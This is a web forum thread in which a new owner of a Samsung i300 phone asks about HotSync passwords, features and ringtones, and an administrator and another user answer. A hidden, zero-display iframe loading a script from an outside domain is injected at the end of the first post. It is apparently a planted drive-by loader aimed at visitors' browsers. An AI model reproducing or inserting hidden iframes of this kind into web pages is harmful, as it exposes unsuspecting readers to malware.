+ Reply to Thread

Talking NEW TO THE i300 and I am getting overwhelmed

Hey everyone.

I just wanted to know of some of the different things I can do with my i300.

Also, I am trying to get to know how to use this "hot sync" thing, but i dunno how. It asks me for my password whenever i push the button on my cradle. What am i supposed to do?

Also, is there a way that i can download any kind of ringers to my phone or somethin cause the ones that my phone has SUCKS! lol.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Administrator
    well you can not DL any new ringers.

as for your other questions, please, please search the board.. im sure you know you are not the only one who has had these questions and they are all covered on this forum. just type in your searc query and you will get more info than the samsung techs could tell ya!

but to get you started, the hoystnc password could either be:

last four digits of SSN
    last four digits of phone #

if you bought this second hand fomr someone on fleabay it may be their last phone # or SSN... if you have not done so, then its best to do a cold reset to wipe out any old files and restore the phone back to normal...

Perhaps the best place to start is the manual. It can be difficult to find, especially if you are searching for it at sprintpcs or samsung web sites. Luckily, I was able to scour for it on the web. I've created an attachment for the file on this board. Hope it works.

Administrator
    the online manual should be available on your pcs manage page...